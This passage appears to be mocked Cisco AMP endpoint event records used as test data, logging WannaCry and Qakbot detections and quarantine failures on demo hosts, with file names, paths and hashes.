Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":612000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":364000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":878000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 